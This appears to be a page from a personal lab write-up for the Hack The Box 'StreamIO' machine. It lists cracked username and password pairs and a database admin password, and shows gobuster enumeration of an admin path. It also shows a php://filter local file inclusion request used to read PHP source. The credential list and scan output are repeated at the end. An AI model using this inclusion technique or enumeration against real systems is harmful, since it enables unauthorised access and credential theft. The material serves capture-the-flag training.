Loggin into application

Lauren:##123a8j8w5123##
Sabrina:!!sabrina$
Thane:highschoolmusical
Barry:$hadoW
Michelle:!?Love?!123
Victoria:!5psycho8!
Clara:%$clara
Lenord:physics69i
Juliette:$3xybitch
Bruno:$monique$1991$
yoshihide:66boysandgirls..
admin:paddpadd

yoshihide:66boysandgirls..

https://streamio.htb/admin/

adot@kali:~/oscp/htb/windows/streamio$ gobuster dir -w ~/opt/wordlists/directories1.txt -x txt,php,asp -u https://streamio.htb/admin/ -k 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://streamio.htb/admin/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/adot/opt/wordlists/directories1.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              txt,php,asp
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 403) [Size: 18]
/images               (Status: 301) [Size: 157] [--> https://streamio.htb/admin/images/]
/Images               (Status: 301) [Size: 157] [--> https://streamio.htb/admin/Images/]
/css                  (Status: 301) [Size: 154] [--> https://streamio.htb/admin/css/]
/Index.php            (Status: 403) [Size: 18]
/js                   (Status: 301) [Size: 153] [--> https://streamio.htb/admin/js/]
/master.php           (Status: 200) [Size: 58]
/fonts                (Status: 301) [Size: 156] [--> https://streamio.htb/admin/fonts/]
/IMAGES               (Status: 301) [Size: 157] [--> https://streamio.htb/admin/IMAGES/]
/INDEX.php            (Status: 403) [Size: 18]
/Fonts                (Status: 301) [Size: 156] [--> https://streamio.htb/admin/Fonts/]
/*checkout*           (Status: 400) [Size: 3420]
/CSS                  (Status: 301) [Size: 154] [--> https://streamio.htb/admin/CSS/]
/JS                   (Status: 301) [Size: 153] [--> https://streamio.htb/admin/JS/]

GET /admin/index.php?debug=index.php

GET /admin/index.php?debug=php://filter/convert.base64-encode/resource=index.php

echo "output from burp" | base64 -d > index.php

db_admin:B1@hx31234567890

Same thing for master.php

PreviousSQL Injection NextExploiting master.php (Foothold)

Last updated 8 months ago

Was this helpful?

Lauren:##123a8j8w5123## Sabrina:!!sabrina$ Thane:highschoolmusical Barry:$hadoW Michelle:!?Love?!123 Victoria:!5psycho8! Clara:%$clara Lenord:physics69i Juliette:$3xybitch Bruno:$monique$1991$ yoshihide:66boysandgirls.. admin:paddpadd

adot@kali:~/oscp/htb/windows/streamio$ gobuster dir -w ~/opt/wordlists/directories1.txt -x txt,php,asp -u https://streamio.htb/admin/ -k =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: https://streamio.htb/admin/ [+] Method: GET [+] Threads: 10 [+] Wordlist: /home/adot/opt/wordlists/directories1.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Extensions: txt,php,asp [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /index.php (Status: 403) [Size: 18] /images (Status: 301) [Size: 157] [--> https://streamio.htb/admin/images/] /Images (Status: 301) [Size: 157] [--> https://streamio.htb/admin/Images/] /css (Status: 301) [Size: 154] [--> https://streamio.htb/admin/css/] /Index.php (Status: 403) [Size: 18] /js (Status: 301) [Size: 153] [--> https://streamio.htb/admin/js/] /master.php (Status: 200) [Size: 58] /fonts (Status: 301) [Size: 156] [--> https://streamio.htb/admin/fonts/] /IMAGES (Status: 301) [Size: 157] [--> https://streamio.htb/admin/IMAGES/] /INDEX.php (Status: 403) [Size: 18] /Fonts (Status: 301) [Size: 156] [--> https://streamio.htb/admin/Fonts/] /*checkout* (Status: 400) [Size: 3420] /CSS (Status: 301) [Size: 154] [--> https://streamio.htb/admin/CSS/] /JS (Status: 301) [Size: 153] [--> https://streamio.htb/admin/JS/]